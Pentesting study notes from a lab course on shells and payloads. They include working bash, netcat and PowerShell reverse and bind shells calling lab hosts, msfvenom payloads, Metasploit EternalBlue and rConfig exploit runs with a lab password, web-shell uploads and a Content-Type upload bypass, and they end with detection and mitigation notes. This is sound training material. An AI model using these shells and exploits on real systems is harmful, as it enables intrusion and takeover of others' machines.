Introduction
Shells and payloads are the bridge between exploiting a vulnerability and actually interacting with a target system. A shell gives you interactive access to the OS, while a payload is the code or command that delivers that access.
Shells and Payloads at a Glance
A shell is a program that lets you enter commands and receive output, and in security it is often the result of exploitation. In practice you select a payload based on the target OS, available interpreters, and what the network allows.
Payload meanings vary by context, and the list below captures the common uses. This helps avoid confusion between network, programming, and security definitions.
- Networking: the data portion of a packet
- Programming: the data executed by code
- Security: code that triggers a vulnerability or action
Shell Fundamentals
Shell fundamentals explain how you interact with the host once access is gained. Once you see output, you can pivot to enumeration.
ps
env
Terminal Emulators and Interpreters
You interact with a shell through a terminal emulator, and the shell itself is a command language interpreter. Common examples include Windows Terminal and GNOME Terminal.
Bind Shells and Reverse Shells
A bind shell opens a listener on the target and waits for you to connect, which means inbound access must be allowed by host and network firewalls. A reverse shell flips the direction, which is usually easier to pass through egress rules.
Bind shell example with netcat:
# 1. Listener on the target
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
# 2. Connect from the attacker
nc -nv 10.129.41.200 7777
Fallback reverse shell if bind fails:
# 1. Listener on the attacker
nc -l 7777
# 2. Target connects back
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.15.38 7777 > /tmp/f
Reverse shell from Windows PowerShell:
# 1. Listener on the attacker
sudo nc -lvnp 443
# 2. Target connects back
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Payload Concepts and Delivery
Payloads are the code or command that executes on the target, so they must match OS, architecture, and available interpreters. Delivery depends on your access path and should balance reliability, stealth, and the ability to maintain an interactive session.
Staged vs Stageless Payloads
Staged payloads deliver a small loader first, then fetch the full payload over the network. The naming often reveals the type, such as windows/meterpreter/reverse_tcp (staged) versus windows/meterpreter_reverse_tcp (stageless).
Metasploit and MSFvenom
Metasploit is a modular framework that combines exploits and payloads, which speeds up exploitation and post-exploitation. MSFvenom generates standalone payloads you can deliver with email, file uploads, or manual transfer.
The command flow below is a typical Metasploit run against SMB. Treat it as a template and adjust target-specific values.
sudo msfconsole
msf6 > search smb
msf6 > use 56
msf6 exploit(windows/smb/psexec) > options
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71
msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$
msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!
msf6 exploit(windows/smb/psexec) > set SMBUser htb-student
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.222
msf6 exploit(windows/smb/psexec) > exploit
meterpreter > shell
MSFvenom basics are quick to test and easy to adapt to target constraints. Use these commands as a minimal starting point.
msfvenom -l payloads
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
sudo nc -lvnp 443
Windows Shells and Payload Types
Windows targets allow many payload types, so selection depends on delivery vector and execution context. Choose the method that aligns with available privileges and application controls.
The list below highlights common Windows payload types and why they are useful. These options map to native OS tooling.
- DLL: for injection or DLL hijacking
- Batch files: simple scripted commands
- MSI: installable payloads via msiexec
- PowerShell: flexible and powerful scripting
Windows Exploit Walkthrough
A simple workflow is to enumerate the host, confirm a known vulnerability, and then exploit with a suitable module. Always verify access level with getuid and drop into a system shell for normal command use.
nmap -v -A 10.129.201.97
sudo msfconsole
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.129.201.97
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
msf6 > search eternal
msf6 > use 2
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.129.201.97
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.12
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 4444
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
meterpreter > getuid
meterpreter > shell
CMD vs PowerShell Usage
Use CMD when you need minimal interaction on older hosts or simple batch commands. PowerShell is better for object-based output and custom scripting.
CMD is useful when you need low-friction access with minimal dependencies. The list below highlights common cases.
- PowerShell is missing or restricted
- You only need simple commands
- You rely on basic batch scripts
PowerShell is useful when you need richer scripting and object handling. The list below highlights common cases.
- You need cmdlets or .NET objects
- You are automating complex tasks
- You are working with cloud services
NIX Shells and TTY Upgrades
Linux and Unix targets often provide multiple interpreters, so you should identify what is available before selecting a payload. If the shell is limited, upgrading it to a fully interactive TTY improves stability and usability.
The workflow below is a typical Linux exploitation path using a web app RCE. Use it as a reference and swap in the right target values.
nmap -sC -sV 10.129.201.101
sudo msfconsole
msf6 > search rconfig
msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOSTS 10.129.201.101
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set LHOST 10.10.14.111
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set LPORT 4444
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/sh")'
Interactive Shell Generation
If you land a limited shell, spawning an interactive interpreter is usually the next step. These commands often need a scriptable execution context.
/bin/sh -i
perl -e 'exec "/bin/sh";'
exec "/bin/sh"
os.execute('/bin/sh')
awk 'BEGIN {system("/bin/sh")}'
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
Web Shells in Practice
Web shells are browser-based command interfaces deployed through file upload or code injection flaws. They often provide the first foothold on a web server but come with limited interactivity and higher detection risk.
Common pitfalls show up quickly during enumeration, especially in unstable web apps. The list below summarizes the most frequent issues.
- Uploads removed by cleanup jobs
- Limited command chaining and file transfer
- Higher forensic footprint on the web server
Laudanum
Laudanum is a collection of ready-to-use web shells for multiple languages, which makes it a fast option during web exploitation. You usually copy a shell file, edit it to allow your IP, and upload it through the vulnerable application.
cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
nano /home/tester/demo.aspx
# Update allowedIps with your IP, then upload demo.aspx
# Example access path: http://victima.com\files\demo.aspx
Antak
Antak is an ASPX web shell from the Nishang project and is useful for Windows targets because it leverages PowerShell. The workflow is similar to Laudanum, but you also set a username and password inside the file before uploading.
cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx
nano /home/administrator/Upload.aspx
# Update Username/Password in the file, then upload
# Example access path: http://status.inlanefreight.local\files\Upload.aspx
PHP Web Shell with Burp Suite
Some applications restrict upload content types, so you may need to intercept and modify the request. Burp Suite can change Content-Type to bypass basic checks, letting you upload a PHP web shell disguised as an image.
# Intercept the upload request in Burp and change:
# Content-Type: application/x-php -> Content-Type: image/gif
# Then forward and access the uploaded PHP file via its web path
Detection, Visibility, and Mitigation
Defenders map shells and payloads to the MITRE ATT&CK framework, primarily in Initial Access, Execution, and Command and Control. Visibility is critical because shells often look like normal traffic unless you baseline behavior.
Common events to monitor help detect both successful and attempted execution. The list below focuses on the highest signal items.
- File uploads to web applications
- Non-admin users running shell commands
- Unusual network sessions or beaconing on ports like 4444
Visibility best practices reduce blind spots across hosts and network paths. The list below highlights practical starting points.
- NetFlow and firewall log analysis
- Centralized SIEM alerts for shell activity
Mitigations to reduce shell success focus on limiting execution paths and lateral movement. The list below summarizes the most effective controls.
- Application sandboxing for exposed services
- Least privilege and strong permission boundaries
- Host segmentation and hardened DMZ placement
Reference
This article is based on my personal study notes from the Information Security Foundations track.
Full repository: https://github.com/lameiro0x/pentesting-path-htb